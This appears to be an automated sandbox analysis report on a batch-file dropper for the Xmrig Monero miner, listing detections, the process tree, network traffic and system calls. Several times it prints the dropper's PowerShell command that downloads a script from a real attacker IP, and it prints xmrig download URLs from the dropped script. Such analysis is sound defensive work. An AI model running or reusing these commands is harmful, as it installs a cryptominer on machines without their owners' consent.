Edit tour

Windows Analysis Report
ceR3axDjok.bat

Overview

General Information

Sample name:	ceR3axDjok.bat renamed because original name is a hash value
Original sample name:	8524f6f843902e2d19f29a578f76adf6.bat
Analysis ID:	1587642
MD5:	8524f6f843902e2d19f29a578f76adf6
SHA1:	23e89e62096675945ab5363a0d4a940573f2aa77
SHA256:	98415c21b45b1008b74b44cae8f3c27e803d2bb4a3899c79fb079c3cc833ac36
Tags:	batuser-abuse_ch
Infos:

Detection

Xmrig

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Found strings related to Crypto-Mining

Suspicious powershell command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6628 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6044 cmdline: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'" MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\script.php	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Sigma Signatures

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'", ProcessId: 6044, ProcessName: powershell.exe

Suricata Signatures

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:15:33.220488+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49732	45.138.16.193	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://45.138.16.193/xmrig	Avira URL Cloud: Label: malware
Source: http://45.138.16.193/php-exe.php	Avira URL Cloud: Label: malware

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.5% probability

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\Desktop\script.php, type: DROPPED

Found strings related to Crypto-Mining

Source: script.php.2.dr

String found in binary or memory: $httpUrlLinux = 'http://45.138.16.193/xmrig'; // URL per xmrig (Linux)

Source: Joe Sandbox View

ASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL

Source: Network traffic

Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 45.138.16.193:80

Source: global traffic

HTTP traffic detected: GET /php-exe.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.138.16.193Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.16.193

Source: global traffic

HTTP traffic detected: GET /php-exe.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 45.138.16.193Connection: Keep-Alive

Source: ceR3axDjok.bat	String found in binary or memory: http://45.138.16.193/php-exe.php
Source: script.php.2.dr	String found in binary or memory: http://45.138.16.193/xmrig
Source: script.php.2.dr	String found in binary or memory: http://45.138.16.193/xmrig.exe
Source: script.php.2.dr	String found in binary or memory: https://api.moneroocean.stream/miner/$moneroOceanWallet/stats

Source: classification engine

Classification label: mal68.mine.winBAT@4/4@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Desktop\script.php

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6652:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuloniuf.ebl.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ceR3axDjok.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4028			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4085			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep count: 4028 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260	Thread sleep count: 4085 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://45.138.16.193/php-exe.php' -OutFile 'script.php'"

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
